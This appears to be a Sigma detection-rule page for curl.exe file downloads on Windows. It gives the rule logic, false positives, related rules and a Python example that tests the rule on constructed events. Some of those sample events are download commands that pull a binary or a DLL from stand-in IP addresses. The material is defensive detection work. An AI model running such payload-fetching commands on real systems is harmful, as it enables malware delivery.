File Download Via Curl.EXE
Detects file download using curl.exe
Events generated when a new process is spawned on the system. Covers command-line arguments, parent/child relationships, and process metadata.
detection:
  selection_img:
    - Image|endswith: '\curl.exe'
    - Product: 'The curl executable'
  selection_remote:
    CommandLine|contains:
      - ' -O' # covers the alias for --remote-name and --output
      - '--remote-name'
      - '--output'
  condition: all of selection_*
False positives
Scripts created by developers and admins
Administrative activity
The "\Git\usr\bin\sh.exe" process uses the "--output" flag to download a specific file in the temp directory with the pattern "gfw-httpget-xxxxxxxx.txt"
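The detection logic above, evaluated over a few constructed process-creation events as an added example (not the rule author's code). Field names follow the Sigma process_creation taxonomy (Image, CommandLine, Product, ParentImage); the sample events and the ParentImage-based check for the documented Git for Windows false positive are assumptions.

```python
# Added example: evaluates this Sigma rule's detection logic over constructed
# process-creation events. Not the rule's own code; the events and the
# known-false-positive check (ParentImage + temp-file prefix) are assumptions.
from typing import Dict

# selection_img: the image path ends with \curl.exe OR the binary's
# file-version Product field names curl (catches a renamed curl binary).
IMG_SUFFIX = "\\curl.exe"
IMG_PRODUCT = "the curl executable"
# selection_remote: any of these substrings in the command line. Sigma string
# matching is case-insensitive, so ' -O' covers both -O (--remote-name) and
# -o (--output), which is why the rule lists only one of them.
CMDLINE_TERMS = (" -o", "--remote-name", "--output")
# Known false positive listed by the rule: Git for Windows' sh.exe fetching a
# temp file named gfw-httpget-xxxxxxxx.txt via --output.
FP_PARENT_SUFFIX = "\\git\\usr\\bin\\sh.exe"
FP_FILE_PREFIX = "gfw-httpget-"

def matches_rule(event: Dict[str, str]) -> bool:
    image = event.get("Image", "").lower()
    product = event.get("Product", "").lower()
    cmdline = event.get("CommandLine", "").lower()
    selection_img = image.endswith(IMG_SUFFIX) or product == IMG_PRODUCT
    selection_remote = any(term in cmdline for term in CMDLINE_TERMS)
    return selection_img and selection_remote  # condition: all of selection_*

def classify(event: Dict[str, str]) -> str:
    """Return 'match', 'match-known-fp' (matches, but fits the documented
    benign Git for Windows pattern) or 'no-match'."""
    if not matches_rule(event):
        return "no-match"
    parent = event.get("ParentImage", "").lower()
    cmdline = event.get("CommandLine", "").lower()
    if parent.endswith(FP_PARENT_SUFFIX) and FP_FILE_PREFIX in cmdline:
        return "match-known-fp"
    return "match"

# Constructed sample events (paths, hosts and file names are made up).
EVENTS = [
    {"Image": r"C:\Windows\System32\curl.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "curl.exe -O http://198.51.100.10/update.bin", "Product": "The curl executable"},
    {"Image": r"C:\Program Files\Git\mingw64\bin\curl.exe", "ParentImage": r"C:\Program Files\Git\usr\bin\sh.exe",
     "CommandLine": r"curl --output C:\Users\u\AppData\Local\Temp\gfw-httpget-1a2b3c4d.txt https://example.invalid/",
     "Product": "The curl executable"},
    {"Image": r"C:\Users\u\Downloads\tool.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"tool.exe -o C:\Users\u\AppData\Local\Temp\a.dll http://203.0.113.5/a", "Product": "The curl executable"},
    {"Image": r"C:\Windows\System32\curl.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "curl.exe --version", "Product": "The curl executable"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(classify(ev), "<-", ev["CommandLine"])
```

The third event shows why the Product alternative matters: a renamed curl binary never ends with \curl.exe but still carries curl's file-version product string.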
Tactics
Techniques
Other
Curl.EXE Execution
Detects a curl process start on Windows, which could indicate a file download from a remote location or a simple web request to a remote server
This rule was derived from the related rule - both detect similar activity with different scope.
Suspicious Curl.EXE Download
Detects a suspicious curl process start on Windows and outputs the requested document to a local file
This rule was derived from the related rule - both detect similar activity with different scope.